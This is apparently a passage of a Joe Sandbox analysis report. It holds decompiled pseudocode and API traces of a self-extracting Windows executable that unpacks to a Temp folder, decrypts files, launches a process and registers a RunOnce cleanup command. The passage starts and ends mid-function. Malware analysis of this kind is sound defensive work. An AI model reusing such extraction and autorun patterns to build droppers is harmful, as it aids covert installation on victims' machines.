										_t41 =  *0x8a9a40; // 0x3, executed
										_t26 = E008A256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x8a8a24; // 0x0
									 *0x8a9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x8a8a38;
										if( *0x8a8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E008A4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x8a9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E008A3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x8a8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E008A3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E008A44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x8a9124 = E008A6285();
							goto L16;
						}
						_t59 =  *0x8a9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E008A621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x8a8a24;
				if( *0x8a8a24 != 0) {
					L4:
					_t34 = E008A3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E008A51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x8a8a38;
				if( *0x8a8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x008a2f1d
0x008a2f28
0x008a2f2f
0x008a2f3d
0x008a2f6c
0x008a2f6c
0x008a2f71
0x008a2f73
0x008a3041
0x008a3041
0x008a3043
0x008a3053
0x008a3053
0x008a2f79
0x008a2f80
0x00000000
0x008a2f86
0x008a2f86
0x008a2f93
0x008a2f9e
0x008a2fa0
0x008a2fa6
0x008a2fb8
0x008a2fba
0x008a2fbe
0x008a2fc6
0x008a2fcc
0x008a2fd4
0x008a2fd6
0x008a2fd8
0x008a2fe0
0x008a2fe6
0x008a2fee
0x008a2ff0
0x008a2ff5
0x008a2ff5
0x008a2fee
0x008a2fd4
0x008a2ff8
0x008a2ffe
0x008a3004
0x008a3017
0x008a301c
0x008a3024
0x008a3054
0x008a305a
0x008a3065
0x008a3065
0x008a306c
0x008a306e
0x008a3075
0x008a307a
0x008a307a
0x008a307c
0x008a3081
0x008a3087
0x008a3089
0x008a30a1
0x008a30a1
0x008a30a9
0x008a30ab
0x008a30ad
0x008a30af
0x008a30af
0x008a30ad
0x008a30b6
0x00000000
0x008a308b
0x008a308b
0x008a3091
0x00000000
0x00000000
0x008a3093
0x008a3098
0x008a309a
0x00000000
0x00000000
0x008a309c
0x00000000
0x008a309c
0x008a3089
0x008a305c
0x008a3061
0x008a3063
0x00000000
0x00000000
0x00000000
0x008a3063
0x008a302b
0x008a3032
0x008a303c
0x00000000
0x008a303c
0x008a3006
0x008a300c
0x00000000
0x00000000
0x008a300e
0x008a3015
0x00000000
0x00000000
0x00000000
0x008a3015
0x008a2f80
0x008a2f3f
0x008a2f46
0x008a2f5f
0x008a2f5f
0x008a2f64
0x008a2f66
0x00000000
0x00000000
0x00000000
0x008a2f66
0x008a2f4f
0x00000000
0x00000000
0x008a2f55
0x008a2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 008A2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 008A2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 008A2FC6
DecryptFileA.ADVAPI32 ref: 008A2FE6
FreeLibrary.KERNEL32(00000000), ref: 008A2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008A301C

Part of subcall function 008A51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008A2F4D,?,00000002,00000000), ref: 008A5201

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A2FDB, 008A3017
advapi32.dll, xrefs: 008A2F99
DecryptFileA, xrefs: 008A2FC0

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-2712585282
Opcode ID: 37ecaeb9738e85ae97f711c6da5f1982d537d142fa957efd96e4fc986bef6fd7
Instruction ID: 016d2e5a3e4c7d903aff8a8b1eee6fb5179b0c8722f9c0a6c7b91120f65af425
Opcode Fuzzy Hash: 37ecaeb9738e85ae97f711c6da5f1982d537d142fa957efd96e4fc986bef6fd7
Instruction Fuzzy Hash: 1741A431A00A15DAFB34AB79AC49B6A37A8FB57750F000166F941C2D91FF74DE80CA62

Uniqueness

Uniqueness Score: -1.00%

Function 008A5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E008A5467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x8a91e4;
					_t42 = 0x104;
					E008A1680(0x8a91e4, 0x104);
					L14:
					_t13 = E008A58C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x8a9124 = 0;
							_t14 = 1;
							L24:
							return E008A6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E008A597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x8a8a20; // 0x0
						if(_t61 != 0) {
							 *0x8a8a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x8a9124 = E008A6285();
						goto L22;
					}
					 *0x8a8a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E008A53A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x8a91e4;
				E008A1781(0x8a91e4, 0x104, __ecx,  &_v268);
				if(( *0x8a9a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E008A658A(_t48, 0x104, 0x8a1140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E008A658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}

0x008a5472
0x008a5479
0x008a5481
0x008a5484
0x008a551c
0x008a5521
0x008a5528
0x008a552d
0x008a552f
0x008a5539
0x008a554d
0x008a554d
0x008a5552
0x008a5585
0x008a5585
0x008a558b
0x008a558d
0x008a559d
0x008a559d
0x008a5557
0x008a555e
0x00000000
0x00000000
0x008a5560
0x008a5566
0x008a5569
0x008a556f
0x008a556f
0x008a5581
0x008a5581
0x00000000
0x008a5581
0x008a5545
0x008a557c
0x00000000
0x008a557c
0x008a5547
0x00000000
0x008a5547
0x008a548a
0x008a5490
0x008a5497
0x00000000
0x00000000
0x008a549d
0x008a54ab
0x008a54b4
0x008a54c0
0x008a550c
0x008a5511
0x008a5515
0x00000000
0x008a5515
0x008a54c9
0x008a54d6
0x008a54d8
0x008a54fe
0x008a5503
0x008a5507
0x00000000
0x008a5507
0x008a54da
0x008a54dd
0x008a54f7
0x00000000
0x008a54f7
0x008a54df
0x008a54e2
0x008a54f0
0x00000000
0x008a54f0
0x008a54e7
0x00000000
0x00000000
0x008a54e9
0x00000000

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A556F

Part of subcall function 008A53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A53FB
Part of subcall function 008A53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A5402
Part of subcall function 008A53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A541F
Part of subcall function 008A53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A542B
Part of subcall function 008A53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008A5434

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A547D, 008A5481, 008A54AB, 008A551C, 008A553C, 008A5568
mips, xrefs: 008A54F7
alpha, xrefs: 008A54F0
ppc, xrefs: 008A54E9
i386, xrefs: 008A54FE

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-1143122538
Opcode ID: bad0c1cdbe780fc61f1877f2ed983081080b5d62faa60051495c64bb1b7b200a
Instruction ID: c970dcc54b08895c3f0346d198d96c5654bb36ed955e3cd089210cdd67f06f56
Opcode Fuzzy Hash: bad0c1cdbe780fc61f1877f2ed983081080b5d62faa60051495c64bb1b7b200a
Instruction Fuzzy Hash: C331F470F00A149BFF109F2D9C4897E77AAFB83704B04012AE552C2E50EB78CE81CA96

Uniqueness

Uniqueness Score: -1.00%

Function 008A2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E008A2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x8a8004; // 0x8481bc1d
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E008A6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E008A1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E008A16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E008A1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E008A16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E008A16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E008A658A( &_v280, 0x104, 0x8a1140);
								E008A2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x008a2398
0x008a239e
0x008a23a3
0x008a23a5
0x008a23ae
0x008a23b3
0x008a24cb
0x008a24d2
0x008a24d3
0x008a24d4
0x008a24df
0x008a23c2
0x008a23d1
0x008a23db
0x008a23e4
0x008a23f6
0x008a23fc
0x008a2401
0x00000000
0x00000000
0x00000000
0x00000000
0x008a2407
0x008a2407
0x008a2408
0x008a2411
0x008a241f
0x008a247a
0x008a2483
0x008a2495
0x008a24a3
0x008a2421
0x008a242f
0x008a2453
0x008a245d
0x008a2466
0x008a2472
0x008a2472
0x008a242f
0x008a24af
0x008a24b5
0x008a24be
0x008a24c5
0x00000000
0x008a24c5

APIs

FindFirstFileA.KERNELBASE(?,008A8A3A,008A11F4,008A8A3A,00000000,?,?), ref: 008A23F6
lstrcmpA.KERNEL32(?,008A11F8), ref: 008A2427
lstrcmpA.KERNEL32(?,008A11FC), ref: 008A243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 008A2495
DeleteFileA.KERNEL32(?), ref: 008A24A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 008A24AF
FindClose.KERNELBASE(00000000), ref: 008A24BE
RemoveDirectoryA.KERNELBASE(008A8A3A), ref: 008A24C5

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 8e1234547d67b7f3c209fb9780cc89e8d02504cffa1ae567638ffd253ba4ab9f
Instruction ID: 66b108dccbbcd7f5e1a340e3390c4893bf6639324c9e09281fc4429ba5b7eba7
Opcode Fuzzy Hash: 8e1234547d67b7f3c209fb9780cc89e8d02504cffa1ae567638ffd253ba4ab9f
Instruction Fuzzy Hash: 74319231604A40ABE731DB68CD8DAEB73ACFBCA305F04492DB555C2A90EB789909C757

Uniqueness

Uniqueness Score: -1.00%

Function 008A3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E008A3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E008A6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x8a9124 = E008A6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
					_t45 = 0x4c4;
					E008A44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x8a8a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x8a9a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x8a9a2c = _t44;
						}
					}
				}
				E008A411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x8a9a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x008a3fef
0x008a3ffa
0x008a4001
0x008a4008
0x008a400a
0x008a400b
0x008a4010
0x008a410a
0x008a411a
0x008a411a
0x008a401c
0x008a401d
0x008a401e
0x008a401f
0x008a4033
0x008a403b
0x008a40ca
0x008a40e9
0x008a40f8
0x008a4101
0x008a4106
0x008a4106
0x008a4108
0x008a4108
0x00000000
0x008a4108
0x008a4049
0x008a405c
0x008a4062
0x008a4068
0x008a406e
0x008a4070
0x008a4077
0x008a407f
0x008a4089
0x008a408b
0x008a408b
0x008a4089
0x008a4077
0x008a4091
0x008a409c
0x008a40a8
0x008a40b8
0x00000000
0x008a40c2
0x00000000
0x008a40c2

APIs

CreateProcessA.KERNELBASE ref: 008A4033
WaitForSingleObject.KERNEL32(?,000000FF), ref: 008A4049
GetExitCodeProcess.KERNELBASE ref: 008A405C
CloseHandle.KERNEL32(?), ref: 008A409C
CloseHandle.KERNEL32(?), ref: 008A40A8
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008A40DC
FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 008A40E9

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
String ID:
API String ID: 3183975587-0
Opcode ID: 8f32089fb655be05343edb776833d7d898737abdea629006de0e5e838a792384
Instruction ID: 583e74efd6b6af936774a69741a411e541d04a31d9f11cfa883a114bbb26eac9
Opcode Fuzzy Hash: 8f32089fb655be05343edb776833d7d898737abdea629006de0e5e838a792384
Instruction Fuzzy Hash: 5231BF31640618BBFB609B69DC48FAB777CFBD6700F1001A9F645D29A1CB744C85CB21

Uniqueness

Uniqueness Score: -1.00%

Function 008A2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E008A2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x8aa288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x8a9124 = 0;
				if(E008A2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E008A2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E008A52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x8a8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x8a9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E008A1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x8a8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x8a9124; // 0x80070002
				return _t7;
			}

0x008a2c03
0x008a2c0d
0x008a2c18
0x008a2c20
0x008a2c2e
0x008a2c32
0x008a2c36
0x008a2c3d
0x008a2c43
0x008a2c45
0x008a2c47
0x008a2c49
0x008a2c4e
0x008a2c4e
0x008a2c47
0x008a2c32
0x008a2c20
0x008a2c50
0x008a2c54
0x008a2c57
0x008a2c64
0x008a2c66
0x008a2c6b
0x008a2c6d
0x008a2c74
0x008a2c76
0x008a2c7c
0x008a2c7e
0x008a2c87
0x008a2c89
0x008a2c89
0x008a2c87
0x008a2c7c
0x008a2c74
0x008a2c8e
0x008a2c95
0x008a2c98
0x008a2c98
0x008a2c9e
0x008a2ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,008A6BB0,008A0000,00000000,00000002,0000000A), ref: 008A2C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,008A6BB0,008A0000,00000000,00000002,0000000A), ref: 008A2C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 008A2C28
CloseHandle.KERNEL32(00000000,?,?,008A6BB0,008A0000,00000000,00000002,0000000A), ref: 008A2C98

Strings

HeapSetInformation, xrefs: 008A2C22
Kernel32.dll, xrefs: 008A2C13

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: ce3be18cc820cac9d28e12d6c424b235d11ead2c9e911e9e42b9eea5f6f06761
Instruction ID: 94beeca1428b7bf8b7550128c3e3a26ba99027568248fd6b06b32469607b9b31
Opcode Fuzzy Hash: ce3be18cc820cac9d28e12d6c424b235d11ead2c9e911e9e42b9eea5f6f06761
Instruction Fuzzy Hash: 3C11C231200605ABFB346BBCAC88B6F3759FB8B7A0B050025F951D3E50DB34DC41C662

Uniqueness

Uniqueness Score: -1.00%

Function 008A6F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A6F40() {

				SetUnhandledExceptionFilter(E008A6EF0); // executed
				return 0;
			}

0x008a6f45
0x008a6f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 008A6F45

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6f11e282e49edf132b15a1edd4f20b979af37ca058bb42790d9301e0c8e4aca1
Instruction ID: 71088d8ed21020bb96e28b26c794457ef7ba027bef587d0caf0fa22a905c5d4d
Opcode Fuzzy Hash: 6f11e282e49edf132b15a1edd4f20b979af37ca058bb42790d9301e0c8e4aca1
Instruction Fuzzy Hash: 1490026425114057B6151B70DD195157591BA4F602B955460A032C4D98EBA444619912

Uniqueness

Uniqueness Score: -1.00%

Function 008A202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E008A202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E008A6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E008A171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E008A658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x8a9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x8a91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x8a91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x8a91e5);
						if(_t90 != 0) {
							 *0x8a8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP000.TMP\");
							E008A171E(_t90, _t84, _t54,  &_v268);
